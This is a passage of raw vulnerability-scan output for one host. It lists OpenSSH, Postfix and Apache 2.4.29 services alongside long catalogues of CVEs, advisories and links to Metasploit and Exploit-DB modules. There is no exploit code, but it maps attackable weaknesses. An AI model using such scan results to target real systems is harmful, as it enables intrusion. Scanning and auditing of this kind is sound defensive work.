Vulnerability [100584] OpenSSH X Connections Session Hijacking Vulnerability [100153] OpenSSH CBC Mode Information Disclosure Vulnerability [66170] CentOS Security Advisory CESA-2009:1470 (openssh) [65987] SLES10: Security update for OpenSSH [65819] SLES10: Security update for OpenSSH [65514] SLES9: Security update for OpenSSH [65513] SLES9: Security update for OpenSSH [65334] SLES9: Security update for OpenSSH [65248] SLES9: Security update for OpenSSH [65218] SLES9: Security update for OpenSSH [65169] SLES9: Security update for openssh,openssh-askpass [65126] SLES9: Security update for OpenSSH [65019] SLES9: Security update for OpenSSH [65015] SLES9: Security update for OpenSSH [64931] CentOS Security Advisory CESA-2009:1287 (openssh) [61639] Debian Security Advisory DSA 1638-1 (openssh) [61030] Debian Security Advisory DSA 1576-2 (openssh) [61029] Debian Security Advisory DSA 1576-1 (openssh) [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc) [60803] Gentoo Security Advisory GLSA 200804-03 (openssh) [60667] Slackware Advisory SSA:2008-095-01 openssh [59014] Slackware Advisory SSA:2007-255-01 openssh [58741] Gentoo Security Advisory GLSA 200711-02 (openssh) [57919] Gentoo Security Advisory GLSA 200611-06 (openssh) [57895] Gentoo Security Advisory GLSA 200609-17 (openssh) [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6)) [57492] Slackware Advisory SSA:2006-272-02 openssh [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5) [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc) [57470] FreeBSD Ports: openssh [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc) [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH) [56294] Slackware Advisory SSA:2006-045-06 openssh [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again [53788] Debian Security Advisory DSA 025-1 (openssh) [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc) [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc) [11343] OpenSSH Client Unauthorized Remote Forwarding [10954] OpenSSH AFS/Kerberos ticket/token passing [10883] OpenSSH Channel Code Off by 1 [10823] OpenSSH UseLogin Environment Variables SecurityTracker - https://www.securitytracker.com: [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies OSVDB - http://www.osvdb.org: [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure [70873] OpenSSH Legacy Certificates Stack Memory Disclosure [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation [56921] OpenSSH Unspecified Remote Compromise [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution [43745] OpenSSH X11 Forwarding Local Session Hijacking [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection [37315] pam_usb OpenSSH Authentication Unspecified Issue [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS [34601] OPIE w/ OpenSSH Account Enumeration [34600] OpenSSH S/KEY Authentication Account Enumeration [32721] OpenSSH Username Password Complexity Account Enumeration [30232] OpenSSH Privilege Separation Monitor Weakness [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution [29152] OpenSSH Identical Block Packet DoS [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS [22692] OpenSSH scp Command Line Filename Processing Command Injection [20216] OpenSSH with KerberosV Remote Authentication Bypass [19142] OpenSSH Multiple X11 Channel Forwarding Leaks [19141] OpenSSH GSSAPIAuthentication Credential Escalation [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass [16567] OpenSSH Privilege Separation LoginGraceTime DoS [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness [9550] OpenSSH scp Traversal Arbitrary File Overwrite [6601] OpenSSH *realloc() Unspecified Memory Errors [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow [6073] OpenSSH on FreeBSD libutil Arbitrary File Read [6072] OpenSSH PAM Conversation Function Stack Modification [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass [5408] OpenSSH echo simulation Information Disclosure [5113] OpenSSH NIS YP Netgroups Authentication Bypass [4536] OpenSSH Portable AIX linker Privilege Escalation [3938] OpenSSL and OpenSSH /dev/random Check Failure [3456] OpenSSH buffer_append_space() Heap Corruption [2557] OpenSSH Multiple Buffer Management Multiple Overflows [2140] OpenSSH w/ PAM Username Validity Timing Attack [2112] OpenSSH Reverse DNS Lookup Bypass [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness [1853] OpenSSH Symbolic Link 'cookies' File Removal [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow [730] OpenSSH Channel Code Off by One Remote Privilege Escalation [688] OpenSSH UseLogin Environment Variable Local Command Execution [642] OpenSSH Multiple Key Type ACL Bypass [504] OpenSSH SSHv2 Public Key Authentication Bypass [341] OpenSSH UseLogin Local Privilege Escalation
25	tcp	open	smtp	syn-ack	Postfix smtpd
	smtp-vuln-cve2010-4344	The SMTP server is not Exim: NOT VULNERABLE
	vulscan	VulDB - https://vuldb.com: [108975] Apple macOS up to 10.13.1 Postfix unknown vulnerability [22507] Apple Mac OS X 10.3.6 Postfix Server Spam weak authentication MITRE CVE - https://cve.mitre.org: [CVE-2013-2852] Format string vulnerability in the b43_request_firmware function in drivers/net/wireless/b43/main.c in the Broadcom B43 wireless driver in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and including format string specifiers in an fwpostfix modprobe parameter, leading to improper construction of an error message. [CVE-2011-1720] The SMTP server in Postfix before 2.5.13, 2.6.x before 2.6.10, 2.7.x before 2.7.4, and 2.8.x before 2.8.3, when certain Cyrus SASL authentication methods are enabled, does not create a new server handle after client authentication fails, which allows remote attackers to cause a denial of service (heap memory corruption and daemon crash) or possibly execute arbitrary code via an invalid AUTH command with one method followed by an AUTH command with a different method. [CVE-2011-0411] The STARTTLS implementation in Postfix 2.4.x before 2.4.16, 2.5.x before 2.5.12, 2.6.x before 2.6.9, and 2.7.x before 2.7.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack. [CVE-2010-0230] SUSE Linux Enterprise 10 SP3 (SLE10-SP3) and openSUSE 11.2 configures postfix to listen on all network interfaces, which might allow remote attackers to bypass intended access restrictions. [CVE-2009-2939] The postfix.postinst script in the Debian GNU/Linux and Ubuntu postfix 2.5.5 package grants the postfix user write access to /var/spool/postfix/pid, which might allow local users to conduct symlink attacks that overwrite arbitrary files. [CVE-2008-4977] DISPUTED postfix_groups.pl in Postfix 2.5.2 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/postfix_groups.stdout, (2) /tmp/postfix_groups.stderr, and (3) /tmp/postfix_groups.message temporary files. NOTE: the vendor disputes this vulnerability, stating "This is not a real issue ... users would have to edit a script under /usr/lib to enable it." [CVE-2008-3889] Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 before 2.6-20080902, when used with the Linux 2.6 kernel, leaks epoll file descriptors during execution of "non-Postfix" commands, which allows local users to cause a denial of service (application slowdown or exit) via a crafted command, as demonstrated by a command in a .forward file. [CVE-2008-3646] The Postfix configuration file in Mac OS X 10.5.5 causes Postfix to be network-accessible when mail is sent from a local command-line tool, which allows remote attackers to send mail to local Mac OS X users. [CVE-2008-2937] Postfix 2.5 before 2.5.4 and 2.6 before 2.6-20080814 delivers to a mailbox file even when this file is not owned by the recipient, which allows local users to read e-mail messages by creating a mailbox file corresponding to another user's account name. [CVE-2008-2936] Postfix before 2.3.15, 2.4 before 2.4.8, 2.5 before 2.5.4, and 2.6 before 2.6-20080814, when the operating system supports hard links to symlinks, allows local users to append e-mail messages to a file to which a root-owned symlink points, by creating a hard link to this symlink and then sending a message. NOTE: this can be leveraged to gain privileges if there is a symlink to an init script. [CVE-2007-3791] Buffer overflow in the w_read function in sockets.c in Cami Sardinha and Nigel Kukard policyd before 1.81 for Postfix allows remote attackers to cause a denial of service and possibly execute arbitrary code via long SMTP commands. NOTE: some of these details are obtained from third party information. [CVE-2006-0213] Kolab Server 2.0.1, 2.0.2 and development versions pre-2.1-20051215 and earlier, when authenticating users via secure SMTP, stores authentication credentials in plaintext in the postfix.log file, which allows local users to gain privileges. [CVE-2005-1127] Format string vulnerability in the log function in Net::Server 0.87 and earlier, as used in Postfix Greylisting Policy Server (Postgrey) 1.18 and earlier, and possibly other products, allows remote attackers to cause a denial of service (crash) via format string specifiers that are not properly handled before being sent to syslog, as demonstrated using sender addresses to Postgrey. [CVE-2005-0337] Postfix 2.1.3, when /proc/net/if_inet6 is not available and permit_mx_backup is enabled in smtpd_recipient_restrictions, allows remote attackers to bypass e-mail restrictions and perform mail relaying by sending mail to an IPv6 hostname. [CVE-2004-1113] SQL injection vulnerability in SQLgrey Postfix greylisting service before 1.2.0 allows remote attackers to execute arbitrary SQL commands via the (1) sender or (2) recipient e-mail addresses. [CVE-2004-1088] Postfix server for Apple Mac OS X 10.3.6, when using CRAM-MD5, allows remote attackers to send mail without authentication by replaying authentication information. [CVE-2004-0925] Postfix on Mac OS X 10.3.x through 10.3.5, with SMTPD AUTH enabled, does not properly clear the username between authentication attempts, which allows users with the longest username to prevent other valid users from being able to authenticate. [CVE-2003-0540] The address parser code in Postfix 1.1.12 and earlier allows remote attackers to cause a denial of service (lock) via (1) a malformed envelope address to a local host that would generate a bounce and contains the ".!" string in the MAIL FROM or Errors-To headers, which causes nqmgr to lock up, or (2) via a valid MAIL FROM with a RCPT TO containing a ".!" string, which causes an instance of the SMTP listener to lock up. [CVE-2003-0468] Postfix 1.1.11 and earlier allows remote attackers to use Postfix to conduct "bounce scans" or DDos attacks of other hosts via an email address to the local host containing the target IP address and service name followed by a "!" string, which causes Postfix to attempt to use SMTP to communicate with the target on the associated port. [CVE-2001-0894] Vulnerability in Postfix SMTP server before 20010228-pl07, when configured to email the postmaster when SMTP errors cause the session to terminate, allows remote attackers to cause a denial of service (memory exhaustion) by generating a large number of SMTP errors, which forces the SMTP session log to grow too large. SecurityFocus - https://www.securityfocus.com/bid/: [96142] PostfixAdmin CVE-2017-5930 Session Management Security Bypass Vulnerability [90814] Postfix Admin Multiple Cross Site Request Forgery Vulnerabilities [67250] Postfix Arbitrary Content Security Bypass Vulnerability [66455] Postfix Admin 'functions.inc.php' SQL Injection Vulnerability [65184] Fail2ban Postfix Filter Remote Denial of Service Vulnerability [51680] Postfix Admin Multiple SQL Injection and Cross Site Scripting Vulnerabilities [47778] Postfix SMTP Server Cyrus SASL Support Memory Corruption Vulnerability [36469] Debian and Ubuntu Postfix Insecure Temporary File Creation Vulnerability [31721] Apple Mac OS X 10.5 Postfix Security Bypass Vulnerability [30977] Postfix 'epoll' Linux Event Handler Local Denial of Service Vulnerability [30691] Postfix Local Information Disclosure and Local Privilege Escalation Vulnerabilities [13133] Salim Gasmi GLD Postfix Greylisting Daemon Format String Vulnerability [13129] Salim Gasmi GLD Postfix Greylisting Daemon Buffer Overflow Vulnerability [12445] Postfix IPv6 Unauthorized Mail Relay Vulnerability [11898] SQLgrey Postfix Greylisting Service Unspecified SQL Injection Vulnerability [11633] SQLgrey Postfix Greylisting Service SQL Injection Vulnerability [11323] Apple Mac OS X Postfix Release SMTPD AUTH Username Denial Of Service Vulnerability [8362] Postfix SMTP Malformed E-mail Envelope Address Denial of Service Vulnerability [8361] Postfix Connection Proxying Vulnerability [8333] Multiple Postfix Denial of Service Vulnerabilities [3638] SuSEConfig.postfix chroot Local DoS Attack Vulnerability [3637] SuSEConfig.postfix chroot File Ownership Vulnerability [3544] Postfix SMTP Log Denial Of Service Vulnerability [1428] cyrus With postfix and Procmail Remote Shell Expansion Vulnerabilities IBM X-Force - https://exchange.xforce.ibmcloud.com: [72752] Postfix Admin multiple parameters SQL injection [72751] PostfixAdmin multiple parameters cross-site scripting [67359] Postfix Cyrus SASL library in the SMTP server code execution [55970] SUSE Linux Enterprise postfix security bypass [53425] Postfix in Debian and Ubuntu pid symlink [45876] Apple Mac OS X Postfix configuration file weak security [44865] Postfix file descriptor denial of service [44461] Postfix email information disclosure [44460] Postfix symlink code execution [22655] RHSA-2005:152 updates for postfix not installed [19218] Postfix IPv6 mail relay [18435] SQLgrey Postfix greylisting service SQL injection [18353] Postfix CRAM-MD5 authentication replay attack [17998] SQLgrey Postfix greylisting service SQL injection [17595] Apple Mac OS postfix SMTPD AUTH denial of service [12816] Postfix MAIL FROM or RCPT TO denial of service [12815] Postfix could be used as a distributed denial of service tool [7568] Postfix SMTP log denial of service [4905] Cyrus with postfix and procmail integration could allow remote command execution Exploit-DB - https://www.exploit-db.com: [25392] Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability [22982] Postfix 1.1.x Denial of Service Vulnerabilities (2) [22981] Postfix 1.1.x Denial of Service Vulnerabilities (1) [16841] GLD (Greylisting Daemon) Postfix Buffer Overflow [10023] Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow [6472] Postfix < 2.4.9, 2.5.5, 2.6-20080902 - (.forward) Local DoS Exploit [6337] Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit [934] gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit OpenVAS (Nessus) - http://www.openvas.org: [902517] Postfix SMTP Server Cyrus SASL Support Memory Corruption Vulnerability [881389] CentOS Update for postfix CESA-2011:0422 centos5 x86_64 [881293] CentOS Update for postfix CESA-2011:0843 centos4 x86_64 [881278] CentOS Update for postfix CESA-2011:0422 centos4 x86_64 [881267] CentOS Update for postfix CESA-2011:0843 centos5 x86_64 [880520] CentOS Update for postfix CESA-2011:0422 centos5 i386 [880509] CentOS Update for postfix CESA-2011:0843 centos5 i386 [880488] CentOS Update for postfix CESA-2011:0843 centos4 i386 [880485] CentOS Update for postfix CESA-2011:0422 centos4 i386 [880268] CentOS Update for postfix CESA-2008:0839 centos3 i386 [880023] CentOS Update for postfix CESA-2008:0839 centos3 x86_64 [870658] RedHat Update for postfix RHSA-2011:0423-01 [870440] RedHat Update for postfix RHSA-2011:0843-01 [870418] RedHat Update for postfix RHSA-2011:0422-01 [870021] RedHat Update for postfix RHSA-2008:0839-01 [863100] Fedora Update for postfix FEDORA-2011-6777 [863097] Fedora Update for postfix FEDORA-2011-6771 [862950] Fedora Update for postfix FEDORA-2011-3394 [862938] Fedora Update for postfix FEDORA-2011-3355 [860510] Fedora Update for postfix FEDORA-2008-8593 [860419] Fedora Update for postfix FEDORA-2008-8595 [850126] SuSE Update for postfix SUSE-SA:2010:011 [850031] SuSE Update for postfix SUSE-SA:2008:040 [840658] Ubuntu Update for postfix USN-1131-1 [840648] Ubuntu Update for postfix USN-1113-1 [840227] Ubuntu Update for postfix vulnerabilities USN-642-1 [840190] Ubuntu Update for postfix vulnerability USN-636-1 [831400] Mandriva Update for postfix MDVSA-2011:090 (postfix) [830713] Mandriva Update for postfix MDVSA-2008:171 (postfix) [830635] Mandriva Update for postfix MDVSA-2008:190 (postfix) [830075] Mandriva Update for postfix MDKA-2007:079 (postfix) [72452] Gentoo Security Advisory GLSA 201209-18 (postfixadmin) [71559] Gentoo Security Advisory GLSA 201206-33 (Postfix) [70744] FreeBSD Ports: postfixadmin [69770] FreeBSD Ports: postfix, postfix-base [69733] Debian Security Advisory DSA 2233-1 (postfix) [69363] FreeBSD Ports: postfix, postfix-base [66394] Mandriva Security Advisory MDVSA-2009:224-1 (postfix) [65957] SLES10: Security update for Postfix [65911] SLES10: Security update for Postfix [65353] SLES9: Security update for Postfix [65350] SLES9: Security update for postfix [64696] Mandrake Security Advisory MDVSA-2009:224 (postfix) [61646] Gentoo Security Advisory GLSA 200809-09 (postfix) [61445] Gentoo Security Advisory GLSA 200808-12 (postfix) [61435] Debian Security Advisory DSA 1629-2 (postfix) [61434] Debian Security Advisory DSA 1629-1 (postfix) [60836] FreeBSD Ports: postfix-policyd-weight [58580] Debian Security Advisory DSA 1361-1 (postfix-policyd) [53833] Debian Security Advisory DSA 093-1 (postfix) [53652] Debian Security Advisory DSA 363-1 (postfix) SecurityTracker - https://www.securitytracker.com: [1025521] Postfix SASL Authentication Heap Overflow Lets Remote Users Deny Service [1025179] Postfix Plaintext to TLS Switching Error Lets Remote Users Inject Plaintext Commands [1020800] Postfix Linux epoll File Descriptor Leak Lets Local Users Deny Service [1020700] Postfix Symlink Dereference Bug Lets Local Users Gain Elevated Privileges [1012395] Postfix CRAM-MD5 Replay Attack May Let Remote Users Send Mail [1011532] Postfix Buffer Error May Prevent Remote Users from Being Able to Authenticate Using SMTPD AUTH [1007382] Postfix Bounce Messages Let Remote Users Scan for Open Ports on Other Hosts [1007381] Postfix Address Resolver Parsing Bug Lets Remote Users Hang the System [1002756] Postfix Mail Server Can Be Crashed By Remote Users Initiating Unsuccessful Sessions OSVDB - http://www.osvdb.org: [94034] Linux Kernel Broadcom B43 Wireless Driver b43_request_firmware Function fwpostfix modprobe Parameter Format String Local Privilege Escalation [78567] Postfix Admin backup.php Unspecified SQL Injection [78566] Postfix Admin functions.inc.php pacrypt() Function Unspecified SQL Injection [78565] Postfix Admin create-domain.php Unspecified SQL Injection [78564] Postfix Admin Unspecified XSS [78563] Postfix Admin edit-alias.php Unspecified XSS [78562] Postfix Admin create-alias.php Unspecified XSS [78561] Postfix Admin create-domain.php Unspecified XSS [78560] Postfix Admin templates/edit-vacation.php domain Parameter XSS [78559] Postfix Admin templates/menu.php domain Parameter XSS [72259] Postfix SMTP Cyrus SASL Authentication Context Data Reuse Memory Corruption [71021] Postfix STARTTLS Arbitrary Plaintext Command Injection [68340] Artica postfix.events.php Unrestricted Access Information Disclosure [61983] SUSE Linux postfix Network Interface Remote Access Restriction Bypass [58325] Debian GNU/Linux postfix postfix.postinst Symlink Arbitrary File Overwrite [49634] Postfix postfix_groups.pl Multiple Temporary File Symlink Arbitrary File Overwrite [48973] Apple Mac OS X Postfix Network Access Configuration Weakness [48108] Postfix epoll File Descriptor Leak Local DoS [47659] Postfix Cross-user Filename Local Mail Interception [47658] Postfix Hardlink to Symlink Mailspool Arbitrary Content Append [43888] policyd-weight for Postfix Socket Handling Unspecified Arbitrary File Manipulation [38091] policyd for Postfix sockets.c read_w() Function SMTP Command Remote Overflow [22381] Kolab Server Secure SMTP postfix.log Authentication Credential Disclosure [13470] Postfix IPv6 Patch if_inet6 Failure Arbitrary Mail Relay [12339] SQLgrey Postfix greylisting service Unspecified SQL Injection [12200] Apple Mac OS X Postfix CRAM-MD5 Replay Credentials [11571] SQLgrey Postfix greylisting Email Address SQL Injection [10545] Postfix Multiple Mail Header SMTP listener DoS [10544] Postfix Malformed Envelope Address nqmgr DoS [10500] Apple Mac OS X Postfix SMTPD AUTH Username Overflow DoS [6551] Postfix Bounce Scan / Packet Amplification DDoS [1991] Postfix SMTP Log DoS
	ssl-dh-params	VULNERABLE: Anonymous Diffie-Hellman Key Exchange MitM Vulnerability State: VULNERABLE Transport Layer Security (TLS) services that use anonymous Diffie-Hellman key exchange only provide protection against passive eavesdropping, and are vulnerable to active man-in-the-middle attacks which could completely compromise the confidentiality and integrity of any data exchanged over the resulting session. Check results: ANONYMOUS DH GROUP 1 Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA Modulus Type: Safe prime Modulus Source: Unknown/Custom-generated Modulus Length: 2048 Generator Length: 8 Public Key Length: 2048 References: https://www.ietf.org/rfc/rfc2246.txt
80	tcp	open	http	syn-ack	Apache httpd	2.4.29	(Ubuntu)
	vulners	cpe:/a:apache:http_server:2.4.29: E899CC4B-A3FD-5288-BB62-A4201F93FDCC 10.0 https://vulners.com/githubexploit/E899CC4B-A3FD-5288-BB62-A4201F93FDCC EXPLOIT CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943 CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720 CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790 CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275 CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691 MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ EXPLOIT EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB EXPLOIT EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 EXPLOIT CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 EXPLOIT MSF:ILITIES/UBUNTU-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/ EXPLOIT MSF:ILITIES/UBUNTU-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15715/ EXPLOIT MSF:ILITIES/SUSE-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2017-15715/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ EXPLOIT MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ EXPLOIT MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/ EXPLOIT MSF:ILITIES/FREEBSD-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2017-15715/ EXPLOIT MSF:ILITIES/DEBIAN-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2017-15715/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ EXPLOIT MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/ EXPLOIT MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/ 6.8 